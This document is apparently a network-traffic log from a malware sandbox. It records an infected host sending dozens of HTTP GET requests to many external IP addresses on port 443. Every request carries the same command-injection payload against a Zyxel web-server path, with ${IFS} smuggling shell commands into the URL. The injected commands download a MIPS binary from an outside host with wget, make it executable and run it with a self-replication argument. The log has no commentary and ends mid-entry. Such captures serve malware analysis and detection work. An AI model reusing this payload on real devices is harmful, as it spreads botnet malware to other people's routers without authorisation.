                                                        Feb 2, 2024 06:21:17.071280956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6212192.168.2.1450628171.206.28.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071322918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6213192.168.2.1455176222.122.74.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071386099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6214192.168.2.1446106158.243.37.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071434021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6215192.168.2.145611842.112.69.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071464062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6216192.168.2.144213823.53.3.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071501970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6217192.168.2.1442640191.79.137.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071532965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6218192.168.2.1444688205.101.148.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071568012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6219192.168.2.1457824130.17.243.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071619034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6220192.168.2.143334840.243.92.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071656942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6221192.168.2.145272664.129.83.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071695089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6222192.168.2.145034017.165.103.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071748018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6223192.168.2.1444394196.147.32.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071774960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6224192.168.2.143670465.244.21.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071805000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6225192.168.2.14402229.53.232.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071850061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6226192.168.2.1457944221.135.239.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071902990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6227192.168.2.144676273.57.0.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071949959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6228192.168.2.1446394181.253.129.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.071970940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6229192.168.2.1456414147.211.157.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072001934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6230192.168.2.1434290139.149.145.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072045088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6231192.168.2.1441496200.118.238.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072093964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6232192.168.2.144327488.77.100.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072165012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6233192.168.2.144981276.231.110.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072165012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6234192.168.2.1446228212.55.207.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072205067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6235192.168.2.143397276.242.175.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072271109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6236192.168.2.143730246.108.206.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072313070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6237192.168.2.1446204120.96.54.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072349072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6238192.168.2.145929691.62.73.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072395086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6239192.168.2.143451618.145.157.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072423935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6240192.168.2.145891214.152.108.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072467089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6241192.168.2.145016057.41.138.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072525978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6242192.168.2.1442372125.121.119.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072561026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6243192.168.2.1443396175.41.178.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072571039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6244192.168.2.1452622146.170.154.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072603941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6245192.168.2.1445944182.222.2.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072645903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6246192.168.2.146006435.166.185.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072689056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6247192.168.2.146085294.83.7.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072741032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6248192.168.2.1453358126.9.139.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072792053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6249192.168.2.1433640152.77.40.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072818041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6250192.168.2.1444134114.215.233.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072866917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6251192.168.2.1459888183.167.92.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072894096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6252192.168.2.143797440.119.107.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072940111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6253192.168.2.1433664154.52.156.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.072998047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6254192.168.2.145009060.3.12.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073036909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6255192.168.2.1453536126.220.75.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073064089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6256192.168.2.1458352207.200.225.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073112011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6257192.168.2.144522674.89.7.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073165894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6258192.168.2.143995424.111.77.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073205948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6259192.168.2.1457906150.128.251.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073241949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6260192.168.2.143581649.29.214.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073285103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6261192.168.2.1450896209.255.164.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073318005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6262192.168.2.1451904142.243.245.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073354959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6263192.168.2.1451044121.88.62.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073409081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6264192.168.2.144409247.161.25.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073435068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6265192.168.2.1448284124.73.107.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073479891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6266192.168.2.1457174151.165.95.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073502064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6267192.168.2.1449968139.133.107.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073545933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6268192.168.2.1456088157.255.39.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073575974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6269192.168.2.145266825.223.5.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073621035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6270192.168.2.1447952143.13.161.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073661089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6271192.168.2.143686477.176.215.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073704004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6272192.168.2.144605040.164.204.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073745012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6273192.168.2.145622232.57.62.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073774099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6274192.168.2.145196086.8.236.69443
                                                        TimestampBytes transferredDirectionData
